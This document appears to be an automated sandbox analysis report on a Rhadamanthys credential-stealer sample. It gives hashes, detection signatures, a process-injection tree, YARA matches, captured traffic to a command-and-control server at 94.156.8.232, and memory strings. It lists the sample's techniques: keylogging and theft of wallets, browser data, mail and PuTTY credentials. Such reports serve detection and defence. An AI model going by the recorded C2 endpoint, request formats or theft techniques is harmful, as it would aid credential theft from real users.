Windows Analysis Report
wdeeFKntav.exe

Overview

General Information

Sample name: wdeeFKntav.exe (renamed because original name is a hash value)
Original sample name: e1bece7ba20dbb8100100f8cff2c415d.exe
Analysis ID: 1446715
MD5: e1bece7ba20dbb8100100f8cff2c415d
SHA1: 6ea8efc12ed24f00eb0f230dfec026a6816ba696
SHA256: 98942a0affa9721c90b097c2c6a9cd02959185526c3b7a44377a25b252a16fff
Tags: exe

Detection

RHADAMANTHYS
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • wdeeFKntav.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\wdeeFKntav.exe" MD5: E1BECE7BA20DBB8100100F8CFF2C415D)
    • dialer.exe (PID: 3544 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)
      • OpenWith.exe (PID: 1880 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

No configs have been found

Source | Rule | Description | Author
00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Source | Rule | Description | Author
0.3.wdeeFKntav.exe.45c0000.6.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
2.3.dialer.exe.4fd0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
2.3.dialer.exe.4db0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0.3.wdeeFKntav.exe.47e0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
2.3.dialer.exe.4fd0000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: wdeeFKntav.exe | Avira: detected
Source: wdeeFKntav.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: wdeeFKntav.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F04FF7C CryptUnprotectData
Source: wdeeFKntav.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: wdeeFKntav.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default\AppData
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default\AppData\Local
Source: C:\Windows\System32\OpenWith.exe | File opened: C:\Users\Default\AppData\Local\Microsoft
Source: C:\Windows\System32\OpenWith.exe | Code function: 4x nop then dec esp (3_2_0000025B14E20511)
Source: C:\Windows\System32\OpenWith.exe | Code function: 4x nop then dec esp (3_2_00007DF41F05BFA1)
Source: Joe Sandbox View | JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: global traffic | HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="
    Connection: close
Source: global traffic | HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: xU2b84xhXZbqQYI
Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F081950 WSARecv
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=utf-8
  Server: Microsoft-IIS/8.0
  Date: Thu, 23 May 2024 18:15:27 GMT
  Content-Length: 166
  Connection: close
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: DirectInput8Create memstr_520ab8aa-e
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: GetRawInputData memstr_d15392e1-b
Source: Yara match; File source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,3_3_0000025B168230C7
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_0000025B14E215AC NtAcceptConnectPort,3_2_0000025B14E215AC
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort,3_2_0000025B14E20AC8
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification,3_2_0000025B14E21CD0
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,3_2_0000025B14E21A90
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F059F40 NtAcceptConnectPort,3_2_00007DF41F059F40
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F058D94 NtAcceptConnectPort,3_2_00007DF41F058D94
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F058C90 NtAcceptConnectPort,3_2_00007DF41F058C90
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort,3_2_00007DF41F059CA0
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F058C08 NtAcceptConnectPort,3_2_00007DF41F058C08
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z,3_2_00007DF41F059AF4
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F058AFC NtAcceptConnectPort,3_2_00007DF41F058AFC
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F058A40 NtAcceptConnectPort,3_2_00007DF41F058A40
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F05A600 NtAcceptConnectPort,3_2_00007DF41F05A600
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F05A540 NtAcceptConnectPort,3_2_00007DF41F05A540
Source: C:\Windows\System32\OpenWith.exe; Code function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort,3_2_00007DF41F05A2B0
                      Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
                      Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
                      Source: wdeeFKntav.exeBinary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
                      Source: wdeeFKntav.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@5/0@0/1
                      Source: C:\Windows\SysWOW64\dialer.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
